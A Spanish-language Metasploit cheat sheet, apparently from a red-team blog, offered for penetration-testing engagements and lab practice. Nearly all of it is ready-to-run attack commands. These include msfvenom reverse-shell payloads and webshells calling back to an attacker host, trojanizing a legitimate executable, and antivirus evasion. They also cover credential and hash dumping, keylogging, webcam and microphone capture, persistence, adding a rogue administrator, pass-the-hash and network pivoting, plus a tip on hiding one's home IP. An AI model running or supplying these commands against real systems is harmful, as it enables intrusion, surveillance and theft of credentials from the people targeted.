Metasploit es el framework de explotación que todo el mundo conoce y que la mitad de la gente entiende de verdad. Esta cheat sheet cubre todo, desde la navegación inicial por msfconsole hasta el pivoting en post-explotación — organizado según cómo realmente lo usas en un engagement, no en orden alfabético.

Actualizado para 2026. Guárdalo en favoritos.

Iniciar Metasploit

# Iniciar msfconsole
msfconsole

# Iniciar en modo silencioso (sin banner)
msfconsole -q

# Iniciar con un script de recursos
msfconsole -r setup.rc

# Iniciar con una base de datos específica
msfconsole -y /path/to/database.yml

# Actualizar Metasploit
msfupdate

Configuración de la Base de Datos

La base de datos de Metasploit almacena hosts, servicios, credenciales y botín. Vale la pena configurarla.

# Iniciar PostgreSQL
sudo service postgresql start
# o
sudo systemctl start postgresql

# Inicializar la base de datos
msfdb init

# Verificar estado de la BD
msf> db_status

# Conectar a BD existente
msf> db_connect postgres:[email protected]/msf

# Desconectar
msf> db_disconnect

# Reconstruir la caché
msf> db_rebuild_cache

Comandos Principales de msfconsole

# Ayuda
msf> help
msf> ?

# Buscar módulos
msf> search type:exploit name:eternalblue
msf> search cve:2021-44228
msf> search platform:windows type:exploit rank:excellent
msf> search ms17-010

# Usar un módulo
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> use 0    # usar por número de resultado de búsqueda

# Ver información del módulo
msf> info
msf> info exploit/windows/smb/ms17_010_eternalblue

# Volver
msf> back

# Módulo anterior
msf> previous

# Ver todos los módulos cargados
msf> show exploits
msf> show auxiliary
msf> show post
msf> show payloads
msf> show encoders
msf> show nops
msf> show evasion

Opciones

# Ver opciones del módulo actual
msf> show options
msf> show advanced    # opciones avanzadas
msf> show missing     # opciones requeridas aún no configuradas

# Configurar opciones
msf> set RHOSTS 192.168.1.1
msf> set RPORT 445
msf> set LHOST 192.168.1.100
msf> set LPORT 4444

# Configurar múltiples objetivos
msf> set RHOSTS 192.168.1.1-254
msf> set RHOSTS 192.168.1.0/24
msf> set RHOSTS file:/tmp/targets.txt

# Desconfigurar una opción
msf> unset RHOSTS

# Configurar opciones globales (persisten entre módulos)
msf> setg LHOST 192.168.1.100
msf> setg LPORT 4444

# Desconfigurar opción global
msf> unsetg LHOST

# Guardar configuración en archivo
msf> save

Objetivos y Payloads

# Mostrar objetivos compatibles
msf> show targets
msf> set TARGET 1

# Mostrar payloads compatibles con el exploit actual
msf> show payloads

# Configurar payload
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf> set PAYLOAD generic/shell_reverse_tcp

# Verificar si la combinación módulo/objetivo/payload es viable
msf> check

Ejecutar Módulos

# Ejecutar/explotar
msf> run
msf> exploit

# Ejecutar en segundo plano (no interactivo)
msf> run -j
msf> exploit -j

# Ejecutar sin crear sesión
msf> exploit -n

# Ejecutar contra todos los RHOSTS en paralelo
msf> exploit -j -z

Payloads

Tipos de Payload

TipoDescripción
singlesAutocontenidos, no necesitan stager
stagersPayload pequeño que obtiene el stage
stagesEl payload completo entregado por el stager
meterpreterShell avanzado en memoria, extensible
shellShell de comandos básico

Nombres de Payloads Comunes

# Shells inversos para Windows
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_https
windows/x64/meterpreter_reverse_tcp    # sin stage
windows/x64/shell_reverse_tcp
windows/x64/powershell_reverse_tcp

# Shells de enlace para Windows
windows/x64/meterpreter/bind_tcp

# Shells inversos para Linux
linux/x64/meterpreter/reverse_tcp
linux/x64/meterpreter_reverse_tcp      # sin stage
linux/x64/shell_reverse_tcp

# macOS
osx/x64/meterpreter_reverse_tcp
osx/x64/shell_reverse_tcp

# Payloads web
php/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp
python/meterpreter/reverse_tcp

Staged vs Stageless: El staged (reverse_tcp) usa una primera etapa pequeña para obtener el payload completo. El stageless (meterpreter_reverse_tcp) envía todo en uno. Usa stageless cuando no puedes hacer una segunda conexión saliente (redes restringidas). Usa staged cuando el tamaño del archivo importa.

msfvenom — Generación de Payloads

msfvenom genera payloads independientes fuera de msfconsole.

Uso Básico

msfvenom -p <payload> LHOST=<ip> LPORT=<puerto> -f <formato> -o <salida>

Formatos Comunes

# Ejecutable Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

# DLL Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o payload.dll

# PowerShell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh -o payload.ps1

# ELF Linux
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o payload.elf

# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py

# Webshell PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php

# ASP/ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f asp -o shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx -o shell.aspx

# WAR Java
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o shell.war

# HTA (Aplicación HTML)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f hta-psh -o payload.hta

# Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.100 LPORT=4444 -f raw > shell.sh

Codificación y Evasión

# Listar encoders
msfvenom --list encoders

# Codificar con shikata_ga_nai (solo x86)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

# Stageless con codificación
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x64/xor_dynamic -i 3 -f exe -o stageless.exe

# Añadir relleno NOP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -n 100 -f exe -o payload_nop.exe

# Evitar caracteres malos
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -b "\x00\x0a\x0d" -f exe -o nobadchars.exe

# Inyectar en ejecutable existente
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /path/to/putty.exe -f exe -o trojanizado.exe

# Mantener funcionalidad original
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /path/to/putty.exe -k -f exe -o trojanizado_funcional.exe

Opciones de Listado

# Listar todos los payloads
msfvenom --list payloads

# Listar payloads para una plataforma específica
msfvenom --list payloads | grep windows/x64

# Listar formatos de salida
msfvenom --list formats

# Opciones del payload
msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options

Listeners — Capturando Shells

Multi/Handler (Recomendado)

msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> set LPORT 4444
msf> set ExitOnSession false    # seguir escuchando después de la primera sesión
msf> run -j                      # ejecutar como trabajo en segundo plano

Script de Recursos para Handler

Guarda como handler.rc y carga con msfconsole -r handler.rc:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run -j

Sesiones

Gestión de Sesiones

# Listar sesiones activas
msf> sessions
msf> sessions -l

# Interactuar con una sesión
msf> sessions -i 1

# Terminar una sesión
msf> sessions -k 1
msf> sessions -k all

# Ejecutar un comando en una sesión sin interactuar
msf> sessions -c "whoami" -i 1

# Ejecutar un módulo en una sesión
msf> sessions -s post/windows/manage/shell_to_meterpreter -i 1

# Mejorar shell a Meterpreter
msf> sessions -u 1

# Poner sesión actual en segundo plano
meterpreter> background
# o
meterpreter> bg

Tipos de Sesión

# Shell a Meterpreter
msf> use post/multi/manage/shell_to_meterpreter
msf> set SESSION 1
msf> run

Comandos de Meterpreter

Núcleo

# Ayuda
meterpreter> help
meterpreter> ?

# Poner sesión en segundo plano
meterpreter> background
meterpreter> bg

# Obtener información de la sesión actual
meterpreter> sysinfo

# Usuario actual
meterpreter> getuid

# Obtener PID
meterpreter> getpid

# Variables de entorno
meterpreter> getenv PATH

# Salir/terminar sesión
meterpreter> exit
meterpreter> quit

Sistema de Archivos

# Directorio de trabajo actual
meterpreter> pwd

# Listar directorio
meterpreter> ls
meterpreter> dir

# Cambiar directorio
meterpreter> cd C:\\Users\\target

# Leer archivo
meterpreter> cat C:\\Users\\target\\Desktop\\secret.txt

# Subir archivo
meterpreter> upload /local/file.exe C:\\Windows\\Temp\\file.exe

# Descargar archivo
meterpreter> download C:\\Users\\target\\Desktop\\secret.txt /local/

# Eliminar archivo
meterpreter> rm C:\\Windows\\Temp\\file.exe

# Crear directorio
meterpreter> mkdir C:\\Windows\\Temp\\working

# Buscar archivos
meterpreter> search -f *.txt -d C:\\Users
meterpreter> search -f password* -d C:\\
meterpreter> search -f *.kdbx

Gestión de Procesos

# Listar procesos
meterpreter> ps

# Terminar proceso
meterpreter> kill 1234

# Migrar a otro proceso
meterpreter> migrate 1234

# Migrar a explorer.exe (para estabilidad)
meterpreter> migrate -N explorer.exe

# Ejecutar un programa
meterpreter> execute -f cmd.exe -i -H    # interactivo, oculto
meterpreter> execute -f notepad.exe

# Obtener shell
meterpreter> shell

Escalada de Privilegios

# Verificar privilegios
meterpreter> getprivs

# Obtener SYSTEM (requiere admin)
meterpreter> getsystem

# Mostrar opciones de suplantación de tokens
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token "NT AUTHORITY\\SYSTEM"

# Bypass de UAC (desde msfconsole)
msf> use exploit/windows/local/bypassuac
msf> set SESSION 1
msf> run

Redes

# Interfaces de red
meterpreter> ipconfig
meterpreter> ifconfig

# Tabla ARP
meterpreter> arp

# Conexiones activas
meterpreter> netstat

# Resolución DNS
meterpreter> resolve google.com

# Reenvío de puertos (local:puerto → objetivo:host:puerto)
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.1
meterpreter> portfwd list
meterpreter> portfwd delete -l 3389

# Enrutar a través de sesión (añadir subred a tabla de rutas)
msf> route add 192.168.2.0/24 1    # 1 = ID de sesión
msf> route print
msf> route remove 192.168.2.0/24 1

Volcado de Credenciales

# Volcar hashes (requiere SYSTEM)
meterpreter> hashdump

# Ejecutar Mimikatz (módulo kiwi)
meterpreter> load kiwi
meterpreter> creds_all              # volcar todas las credenciales
meterpreter> lsa_dump_sam           # base de datos SAM
meterpreter> lsa_dump_secrets       # secretos LSA
meterpreter> lsa_dump_cache         # credenciales de dominio en caché
meterpreter> kerberos_ticket_list   # listar tickets Kerberos
meterpreter> kerberos_ticket_purge
meterpreter> golden_ticket_create   # crear golden ticket
meterpreter> wifi_list              # contraseñas WiFi guardadas

# Vía módulo post
msf> use post/windows/gather/hashdump
msf> set SESSION 1
msf> run

Capturas de Pantalla y Keylogging

# Captura de pantalla
meterpreter> screenshot

# Iniciar keylogger
meterpreter> keyscan_start

# Volcar buffer del keylogger
meterpreter> keyscan_dump

# Detener keylogger
meterpreter> keyscan_stop

# Instantánea de webcam
meterpreter> webcam_snap

# Stream de webcam
meterpreter> webcam_stream

# Captura de audio
meterpreter> record_mic -d 10    # 10 segundos

Persistencia

# Autorun en registro
msf> use post/windows/manage/persistence
msf> set SESSION 1
msf> set STARTUP REGISTRY
msf> run

# Tarea programada
msf> use post/windows/manage/persistence_exe
msf> set SESSION 1
msf> set STARTUP SCHEDULER
msf> run

Módulos de Post-Explotación

Windows

# Sugerencias de escalada de privilegios local
msf> use post/multi/recon/local_exploit_suggester
msf> set SESSION 1
msf> run

# Volcar credenciales
msf> use post/windows/gather/credentials/credential_collector
msf> use post/windows/gather/smart_hashdump

# Enumerar aplicaciones
msf> use post/windows/gather/enum_applications
msf> set SESSION 1
msf> run

# Enumerar usuarios conectados
msf> use post/windows/gather/enum_logged_on_users

# Recopilar datos del navegador
msf> use post/windows/gather/enum_chrome
msf> use post/windows/gather/enum_firefox

# Habilitar RDP
msf> use post/windows/manage/enable_rdp
msf> set SESSION 1
msf> run

# Añadir usuario administrador
msf> use post/windows/manage/add_user
msf> set SESSION 1
msf> set USERNAME hacker
msf> set PASSWORD Password123
msf> set GROUP Administrators
msf> run

Linux

# Sugerencias de escalada de privilegios local
msf> use post/multi/recon/local_exploit_suggester

# Volcar hashes
msf> use post/linux/gather/hashdump
msf> use post/linux/gather/pptpd_chap_secrets

# Enumerar configs
msf> use post/linux/gather/enum_configs

# Persistencia con clave SSH
msf> use post/linux/manage/sshkey_persistence

Multiplataforma

# Escaneo TCP/UDP a través de sesión (reconocimiento en pivoting)
msf> use post/multi/gather/ping_sweep
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.2.0/24
msf> set SESSION 1
msf> run

Pivoting

Cuando has comprometido una máquina que puede alcanzar redes a las que no tienes acceso directo.

Pivoting Basado en Rutas

# Añadir ruta a través de sesión
msf> route add 192.168.2.0/24 1     # sesión 1
msf> route print

# Ahora los módulos que apunten a 192.168.2.x pivotarán por la sesión 1
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> set RHOSTS 192.168.2.0/24
msf> run

# Añadir rutas automáticamente desde la sesión
msf> use post/multi/manage/autoroute
msf> set SESSION 1
msf> set ACTION ADD
msf> run

Proxy SOCKS (para herramientas externas)

# Iniciar proxy SOCKS a través de sesión
msf> use auxiliary/server/socks_proxy
msf> set VERSION 5
msf> set SRVHOST 127.0.0.1
msf> set SRVPORT 1080
msf> run -j

# Luego usa proxychains para herramientas externas
# Edita /etc/proxychains4.conf: socks5 127.0.0.1 1080

proxychains nmap -sT -Pn 192.168.2.1
proxychains crackmapexec smb 192.168.2.0/24

Reenvío de Puertos

# Reenviar puerto local a host:puerto remoto vía sesión
meterpreter> portfwd add -l 8080 -p 80 -r 192.168.2.10

# Acceder a RDP interno a través del pivote
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.10
# Luego: xfreerdp /v:127.0.0.1:3389 /u:administrator

Módulos Auxiliares

Escáneres, fuerza bruta, fuzzing — sin explotación, solo reconocimiento y pruebas.

Escaneo

# Escaneo de puertos
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.1.0/24
msf> set PORTS 22,80,443,445,3389
msf> run

# Versión SMB
msf> use auxiliary/scanner/smb/smb_version
msf> set RHOSTS 192.168.1.0/24
msf> run

# Verificación EternalBlue (sin explotación)
msf> use auxiliary/scanner/smb/smb_ms17_010

# Versión SSH
msf> use auxiliary/scanner/ssh/ssh_version

# Título HTTP
msf> use auxiliary/scanner/http/title

Fuerza Bruta

# Fuerza bruta SSH
msf> use auxiliary/scanner/ssh/ssh_login
msf> set RHOSTS 192.168.1.1
msf> set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf> set STOP_ON_SUCCESS true
msf> run

# Fuerza bruta SMB
msf> use auxiliary/scanner/smb/smb_login
msf> set RHOSTS 192.168.1.0/24
msf> set SMBUser administrator
msf> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf> run

Explotación

# EternalBlue (MS17-010)
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.1
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> run

# BlueKeep (CVE-2019-0708)
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# Log4Shell (CVE-2021-44228)
msf> use exploit/multi/http/log4shell_header_injection

# PrintNightmare (CVE-2021-1675)
msf> use exploit/windows/local/cve_2021_1675_printnightmare

# Zerologon (CVE-2020-1472)
msf> use exploit/windows/dcerpc/cve_2020_1472_zerologon

Comandos de Base de Datos

# Ver hosts descubiertos
msf> hosts
msf> hosts -R    # configurar RHOSTS con todos los hosts descubiertos

# Ver servicios descubiertos
msf> services
msf> services -p 445    # filtrar por puerto
msf> services -S smb    # filtrar por nombre de servicio

# Ver credenciales
msf> creds

# Ver botín
msf> loot

# Importar XML de Nmap
msf> db_import /path/to/scan.xml

# Ejecutar Nmap e importar directamente
msf> db_nmap -sV -p- 192.168.1.1

# Exportar base de datos
msf> db_export -f xml /tmp/msf_export.xml

# Gestión de espacios de trabajo
msf> workspace                  # listar workspaces
msf> workspace -a engagement1   # crear workspace
msf> workspace engagement1      # cambiar workspace
msf> workspace -d engagement1   # eliminar workspace

Scripts de Recursos

Automatiza la configuración repetitiva con archivos .rc.

# Ejecutar al inicio
msfconsole -r /path/to/script.rc

# Ejecutar desde dentro de msfconsole
msf> resource /path/to/script.rc

# Grabar comandos en un script
msf> spool /tmp/session.rc    # iniciar grabación
msf> spool off                 # detener grabación

Ejemplo auto_handler.rc:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j -z

Trabajos en Segundo Plano

# Listar trabajos en segundo plano
msf> jobs
msf> jobs -l

# Terminar un trabajo
msf> jobs -k 0

# Terminar todos los trabajos
msf> jobs -K

Combinaciones Útiles

Compromiso Inicial → Movimiento Lateral

# 1. Explotar punto de entrada
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.10
msf> exploit -j

# 2. Añadir ruta de pivote
msf> route add 192.168.2.0/24 1

# 3. Escanear red interna a través del pivote
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> set RHOSTS 192.168.2.0/24
msf> run

# 4. Explotar objetivos internos a través del pivote
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.2.20
msf> exploit -j

Compromiso Rápido de Dominio (si tienes hash de admin)

# Pass-the-hash con PSExec
msf> use exploit/windows/smb/psexec
msf> set RHOSTS 192.168.1.1
msf> set SMBUser administrator
msf> set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> run

Preguntas Frecuentes

¿Cómo ejecuto un exploit básico en Metasploit? Busca el módulo (search ms17-010), úsalo (use exploit/windows/smb/ms17_010_eternalblue), configura RHOSTS y LHOST, luego run. Revisa show options antes de ejecutar — las opciones requeridas faltantes fallarán silenciosamente.

¿Cuál es la diferencia entre run y exploit? No hay diferencia funcional — ambos ejecutan el módulo actual. exploit es el comando heredado; run se añadió por claridad. Usa el que prefieras.

¿Cómo mejoro una shell a una sesión Meterpreter? Usa sessions -u <session_id> desde el prompt de msfconsole. O ejecuta post/multi/manage/shell_to_meterpreter contra una sesión de shell existente.

¿Por qué el antivirus detecta mi payload? Los payloads estándar de Metasploit están muy identificados por firmas. Usa msfvenom con encoders personalizados, empaca con UPX, o cambia a un C2 personalizado (Sliver, Havoc) para cualquier cosa que requiera sigilo. windows/x64/meterpreter/reverse_https es más difícil de detectar que la variante TCP.

¿Cómo configuro un listener persistente (multi/handler)?

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
run -j  # ejecutar como trabajo en segundo plano

ExitOnSession false mantiene el handler activo después de capturar una sesión — crítico para engagements donde se esperan múltiples callbacks.

¿Qué versión de Metasploit debo usar en 2026? Metasploit Framework (código abierto) sirve para la mayoría del trabajo. Metasploit Pro añade automatización y reporting pero cuesta ~$15k/año — solo vale para grandes firmas de pentesting. Si usas Kali, ya tienes Framework. Ejecuta msfupdate para mantenerte actualizado.

Tarjeta de Referencia Rápida

TareaComando
Iniciar msfconsolemsfconsole -q
Buscar módulossearch type:exploit ms17-010
Usar módulouse exploit/windows/smb/ms17_010_eternalblue
Ver opcionesshow options
Configurar objetivoset RHOSTS 192.168.1.1
Configurar payloadset PAYLOAD windows/x64/meterpreter/reverse_tcp
Ejecutar exploitrun o exploit
Poner sesión en segundo planobackground o bg
Listar sesionessessions -l
Interactuar con sesiónsessions -i 1
Obtener SYSTEMgetsystem
Volcar hasheshashdump (o load kiwi; creds_all)
Subir archivoupload /local/file C:\\remote\\path
Descargar archivodownload C:\\remote\\path /local/
Enrutamiento de pivoteroute add 192.168.2.0/24 1
Reenvío de puertoportfwd add -l 3389 -p 3389 -r 192.168.2.1
Generar payloadmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x LPORT=4444 -f exe -o p.exe
Importar escaneo Nmapdb_import scan.xml

Metasploit vs. Otras Herramientas

Metasploit no reemplaza todo — sabe cuándo usar otra cosa.

TareaMetasploitAlternativa
Explotación✅ Biblioteca de módulos sólidaCódigo de exploit manual, CrackMapExec
Post-explotación✅ MeterpreterCobalt Strike, Havoc, Sliver
Generación de payloads✅ msfvenomSliver, Nimpackt, personalizados
Evasión de AV⚠️ Limitada (firmas conocidas)Veil, Shelter, ofuscación manual
C2 / Operaciones largas⚠️ No diseñado para sigiloCobalt Strike, Brute Ratel, Mythic
Escaneo de red⚠️ Más lento que NmapNmap, Masscan, Rustscan
Ataques de contraseñas✅ Buena fuerza brutaHydra, Medusa, Hashcat

Para trabajo en laboratorio y preparación de certificaciones, Metasploit es el estándar. Para operaciones reales de red team, es un punto de partida — la mayoría de los operadores serios usan C2 personalizados para sigilo.

Entorno de Práctica

Metasploit sin un objetivo es inútil. Consíguete uno:

  • TryHackMe — salas amigables para principiantes, muchas construidas alrededor de flujos de trabajo de Metasploit
  • Hack The Box — más realista, muchas máquinas compatibles con MSF en Starting Point
  • Tu propio laboratorio — levanta una VM Windows o un appliance vulnerable (Metasploitable, DVWA) y dispara

Para práctica remota sin la carga de VPN, un VPS de $5-6 en Vultr o DigitalOcean te da una caja de ataque limpia con baja latencia. Levántala, prueba, destrúyela. Sin rastros en tu IP de casa, sin lentitud de VPN.

Novedades en Metasploit 2026

  • Framework 6.4+ incluye evasión mejorada para transporte HTTPS de Meterpreter — certificate pinning y aleatorización de JA3
  • Nuevos módulos que cubren superficies de ataque cloud-native: abuso del servicio de metadatos AWS, explotación de Azure IMDS
  • session -u para mejora de sesiones es más confiable contra objetivos Windows 11 + Server 2022
  • load kiwi actualizado para coincidir con los cambios de API de Mimikatz 2.2.0 — creds_all más estable en controladores de dominio parcheados
  • El módulo proxy SOCKS5 ahora soporta autenticación, cerrando un hueco que hacía el pivoting detectable en algunos entornos

Metasploit es lo más cercano a una navaja suiza en seguridad ofensiva. No ganará todos los engagements solo — pero conocerlo bien significa que te mueves más rápido cuando importa.

Esta guía se actualiza regularmente. Guárdala en favoritos.

RedTeamGuide.com es financiado por sus lectores. Algunos enlaces son de afiliados — podemos ganar una comisión sin costo adicional para ti.

¿Necesitas este tipo de contenido para el blog de tu empresa, documentación de producto o programa de concienciación en seguridad? CipherWrite entrega contenido de ciberseguridad de nivel experto bajo demanda.